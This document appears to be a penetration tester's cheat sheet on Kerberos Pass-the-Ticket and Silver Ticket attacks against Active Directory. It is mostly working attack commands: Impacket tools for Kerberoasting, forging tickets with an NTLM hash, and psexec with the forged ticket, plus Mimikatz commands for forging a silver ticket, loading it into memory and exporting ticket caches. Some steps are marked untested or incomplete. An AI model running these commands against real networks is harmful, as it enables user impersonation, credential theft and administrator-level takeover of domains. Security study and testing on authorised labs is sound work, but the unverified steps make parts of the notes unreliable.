TGT can only be used on the machine it was created for. TGS allows more flexibility than Overpass the Hash as it can be exported/re-injected elsewhere on the network and used to authenticate to a specific service.
Pass-the-Ticket (PtT) involves grabbing an existing Kerberos ticket and using it to impersonate a user. Mimikatz supports gathering either the current user’s Kerberos tickets, or all Kerberos tickets for every user authenticated to the system (if Kerberos unconstrained delegation is configured, this could be a big deal). Once the Kerberos ticket(s) are acquired, they can be passed using Mimikatz and used to access resources (within the Kerberos ticket lifetime).
- Pass the Ticket (HackTricks)
- Silver Ticket (HackTricks)
- QOMPLX Knowledge: Pass-the-Ticket Attacks Explained
- TarlogicSecurity/kerberos_attacks_cheatsheet.md
- Attack Methods for Gaining Domain Admin Rights in Active Directory
Can use crackmapexec with ccache file (KRB5CCNAME).
Prerequisites
- Requires access to the admin share “Admin$”, which requires local administrative rights on the target machine.
- Password hash of the service account (IIS, SQL Server, etc.). Use Kerberoasting first?
On Kali
TO COMPLETE
Get TGS
See Impacket-Ticketer. Get domain SID with Enum4Linux.
The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user. See HackTricks.
Optional – Get Domain SID
powershell Get-ADDomainUse enum4linux, domain SID will be near the top. No need for a full report, so limit output with -P (for password policy only).
enum4linux -P -u $USER -p $PASS $IPOptional – Get SPN
impacket-GetUserSPNs -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS} -outputfile SPNs.txtGenerate Silver Ticket
NTLM=<NTLM hash>
DOMAIN_SID="S-1-5-21-1339291983-1349129144-367733775"
DOMAIN=example.com
SPN=example/CIFS:445impacket-ticketer -nthash $NTLM -domain-sid $DOMAIN_SID -domain $DOMAIN -spn $SPN baduserUse Silver Ticket
export KRB5CCNAME=baduser.ccache
impacket-psexec ${DOMAIN}/baduser@machine.${DOMAIN} -k -no-passGet Kerberos TGT tickets
Not sure if this step is needed.
IP=x.x.x.x
DC_IP=y.y.y.y
HASH=abc...def
USER=myuser
DOMAIN=example.com
PASS=MyPasswordimpacket-getTGT -dc-ip $DC_IP ${DOMAIN}/${USER}:${PASS}Can also pass the hash to get it 😉
impacket-getTGT -dc-ip $DC_IP -hashes :${HASH} ${DOMAIN}/${USER}On Windows
Get Domain name
systeminfo | findstr /B /C:"Domain"Get SID of current user
Example: S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-YYYY, domain SID is S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX, user RID is YYYY.
Need to be logged as domain user or the SID will be wrong. Use “rdesktop -d $DOMAIN”!!!
whoami /userGenerate the RC4 hash from password
A silver ticket, requires the password hash and NOT the cleartext password.
mimikatz.exe
kerberos::hash /password:MyPasswordGenerate a silver ticket for a service (like IIS, SQL Server, etc.)
Also see Mimikatz. The command says “golden” but it is a silver ticket. /ptt will load the ticket in memory.
mimikatz.exe
privilege::debug
kerberos::purge
kerberos::list
kerberos::golden /user:fakeuser /domain:example.com /sid:S-1-5-21-xxxxxxxxxx-xxxxxxxxxx-xxxxxxxxxx /target:<domain from SPN> /service:HTTP /rc4:<password RC4 hash> /ptt
kerberos::listA new service ticket for the SPN has been loaded into memory and contains appropriate group membership permissions. The service application will see the current user as both the built-in local administrator (User Id: 500) and a member of several highly-privileged groups (Groups Id) like the Domain Admins group.
Export the ticket if you want to use it in Kali.
Copy the file to Kali after the export.
kerberos::list /exportConvert from Mimikatz format to ccache (used by Impacket) format.
impacket-ticketConverter $TICKET_KIRBY $TICKET_CCACHENot tested
mimikatz.exe
SEKURLSA::tickets /exportTransfer the generated files to Kali.
impacket-ticketConverter ticket.kirbi ticket.ccache